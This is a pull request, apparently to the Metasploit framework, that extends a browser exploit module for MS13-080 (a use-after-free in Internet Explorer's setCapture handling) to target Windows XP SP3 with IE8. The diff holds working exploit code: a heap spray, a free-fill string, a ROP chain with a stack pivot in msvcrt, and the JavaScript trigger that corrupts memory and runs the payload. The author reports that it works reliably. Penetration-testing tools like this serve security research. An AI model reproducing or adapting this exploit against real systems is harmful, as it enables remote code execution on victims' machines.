### PR TITLE
win XP IE8 exploit for MS13-080

### DIFF
--- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
+++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@@ -38,8 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Unknown', # Exploit in the wild first spotted in Japan
-          'sinn3r'   # Metasploit (thx binjo for the heads up!)
+          'Unknown',      # Exploit in the wild first spotted in Japan
+          'sinn3r',       # Metasploit (thx binjo for the heads up!)
+          'Rich Lundeen'  # IE8 windows xp
         ],
       'References'     =>
         [
@@ -53,16 +54,29 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'       => 'win',
       'BrowserRequirements' =>
         {
-          :source    => /script/i,
-          :os_name   => OperatingSystems::WINDOWS,
-          :ua_name   => HttpClients::IE,
-          :ua_ver    => "9.0",
-          :os_flavor => "7",
-          :office    => /2007|2010/
+          :source    => /script/i
         },
       'Targets'        =>
         [
-          [ 'Automatic', {} ]
+          [ 'Automatic', {} ],
+          [
+            'Windows 7 with Office 2007|2010',
+            {
+              :os_name   => /win/i,
+              :ua_name   => OperatingSystems::WINDOWS,
+              :ua_ver    => "9.0",
+              :os_flavor => "7",
+              :office    => /2007|2010/
+            }
+          ],
+          [
+            'Windows XP with IE 8',
+            {
+              :os_name   => "Windows XP",
+              :ua_name   => HttpClients::IE,
+              :ua_ver    => "8.0"
+            }
+          ]
         ],
       'Payload'        =>
         {
@@ -116,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote
     p
   end
 
-  def get_exploit_html(cli, target_info)
+  def get_exploit_html_ie9(cli, target_info)
     gadgets = {}
     case target_info[:office]
     when '2007'
@@ -238,9 +252,75 @@ window.onload = function() {
     |
   end
 
+  def get_exploit_html_ie8(cli, target_info)
+    code = payload.encoded
+
+    #address containing our heap spray is 0x20302020
+    spray_addr = "\\u2024\\u2030"
+
+    #size to fill after free is 0x50
+    free_fill = spray_addr + "\\u2424" * (((0x50-1)/2)-2)
+
+    rop = [
+      0x77c3868a,   # stack pivot in msvcrt || xchg eax, esp ; rcr dword [ebx-0x75], 0xFFFFFFC1 ; pop ebp ; ret  ;
+      0x20302020    # pointer to stack pivot
+    ].pack("V*")
+
+    rop << generate_rop_payload('msvcrt', code, { 'target'=>'WINDOWS XP SP3' }) << code
+
+    js_rop = Rex::Text.to_unescape(rop)
+
+    %Q|
+<html>
+<script>
+
+#{js_property_spray}
+
+tt = new Array(30);
+
+function trigger()
+{
+  var id_0 = document.createElement("sup");
+  var id_1 = document.createElement("audio");
+
+  document.body.appendChild(id_0);
+  document.body.appendChild(id_1);
+  id_1.applyElement(id_0);
+
+  id_0.onlosecapture=function(e) {
+    document.write("");
+
+    for(i = 0; i < tt.length; i++) {
+      tt[i] = document.createElement('div');
+      tt[i].className ="#{free_fill}";
+    }
+
+  var s = unescape("#{js_rop}");
+  sprayHeap({shellcode:s});
+  }
+
+  id_0['outerText']="";
+  id_0.setCapture();
+  id_1.setCapture();
+}
+
+window.onload = function() {
+  trigger();
+}
+</script>
+    |
+
+  end
+
   def on_request_exploit(cli, request, target_info)
-    html = get_exploit_html(cli, target_info)
+    case target_info[:ua_ver]
+    when "8.0"
+      html = get_exploit_html_ie8(cli, target_info)
+    when "9.0"
+      html = get_exploit_html_ie9(cli, target_info)
+    end
     send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
+
   end
 
 end
@@ -258,6 +338,13 @@ hxds.dll (Microsoft® Help Data Services Module)
   FileVersion:      2.05.50727.4039 (QFE.050727-4000)
 
 mshtml.dll
+
+  WinXP IE8 DLL info:
+  ProductVersion:   8.0.6001.18702
+  FileVersion:      8.0.6001.18702
+  FileDescription:  Microsoft (R) HTML Viewer
+
+  Win7 IE9 DLL info:
   ProductVersion:   9.00.8112.16446
   FileVersion:      9.00.8112.16446 (WIN7_IE9_GDR.120517-1400)
   FileDescription:  Microsoft (R) HTML Viewer

--- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
+++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
             'Windows 7 with Office 2007|2010',
             {
               :os_name   => /win/i,
-              :ua_name   => OperatingSystems::WINDOWS,
+              :ua_name   => HttpClients::IE,
               :ua_ver    => "9.0",
               :os_flavor => "7",
               :office    => /2007|2010/


### PR DESCRIPTION
ie_setmousecapture_uaf only supported IE9 on windows 7, but the vuln was present in different versions of IE. I tested with Windows xp sp3 and IE8 and the exploit works pretty reliably (included the specific mshtml version in the code). I did not test that I did not break the win7 IE9 exploit as I didn't have that setup (but there shouldn't be anything changed)

This pull request is probably not very useful in real life - I was just messing around.
